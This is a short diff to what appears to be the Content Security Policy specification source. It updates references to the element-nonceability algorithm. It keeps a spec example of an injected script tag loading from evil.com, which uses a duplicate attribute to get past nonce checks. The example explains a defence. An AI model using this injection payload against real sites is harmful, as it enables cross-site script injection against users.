diff --git a/index.bs b/index.bs index c87b4f39a2..f5013441a2 100644 --- a/index.bs +++ b/index.bs @@ -19,7 +19,7 @@ Boilerplate: feedback-header off !Participate: File an issue (open issues) !Tests: web-platform-tests content-security-policy/ (ongoing work) Markup Shorthands: css off, markdown on -At Risk: The [[#is-element-nonceable]] algorithm. +At Risk: The [=determine whether an element is nonceable=] algorithm. The following injected string will use a duplicate attribute to attempt to - bypass the [[#is-element-nonceable]] algorithm check: + bypass the [=determine whether an element is nonceable=] algorithm check:
     Hello, <script src='https://evil.com/evil.js' x="" x=
@@ -5010,7 +5086,7 @@ this algorithm returns normally if compilation is allowed, and throws a
       
         Content-Security-Policy: img-src 'none'; script-src 'none'; font-src 'none'
       
- + Supplementing this policy with `default-src 'none'` would improve the page's robustness against this kind of attack.